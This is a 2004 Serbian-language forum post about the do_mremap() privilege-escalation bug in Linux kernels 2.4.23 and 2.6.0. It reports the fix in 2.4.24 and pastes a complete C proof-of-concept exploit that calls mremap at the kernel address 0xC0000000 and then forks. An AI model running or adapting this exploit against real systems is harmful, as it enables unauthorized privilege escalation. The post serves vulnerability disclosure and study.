MyCity » Linux » do_mremap() vulnerability in Linux kernel

do_mremap() vulnerability in Linux kernel

Napisano na dan: 6.1.2004

do_mremap() vulnerability in Linux kernel
Sledeća strana Pagination

Idi na vrh

Poslao: 06 Jan 2004 23:27
Idi na vrh
offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Ovo moze dovesti do povecanja privilegija u 2.4.23 i 2.6.0 kernelima

Odmah je izasla 2.4.24 verzija kernela koja ispravlja ovaj problem.

Vise informacija ovde:
[Link mogu videti samo ulogovani korisnici]

A evo ga i proof of concept exploit...Wink



/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.

MyCity » Linux » do_mremap() vulnerability in Linux kernel

Ko je trenutno na forumu
 

Ukupno su 767 korisnika na forumu :: 57 registrovanih, 8 sakrivenih i 702 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 20624 - dana 04 Apr 2026 04:18

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: Abebe Bikila, aleph_one, berste23, bigfoot, bojcistv, bpvl, BrcakRS, cikadeda, cole77, DankoZemun, darionis, darkkran, Demi87, dnevnasoba, DonRumataEstorski, dule10savic, EVIDENTICAR, Foxdie, goran.vvv, Gosha101980, HogarStrashni, hyla, igorkozar83, JK, JOntra, karevski, Kobrim, komenski, komsija1, kybonacci, mainstream, marki231, Medojed, Metanoja, Miki01, milanpb, mile.ilic75, milenko crazy north, Milometer, mist-mist, mm1811, monomah, nixos, Nobunaga, OgnjenMitric, Pavel Medved, precan, Robin, Sevatar, Sirius, skok, Smiljkovich, Stevan Visoki, tesa, Vladko, W123, Wehicle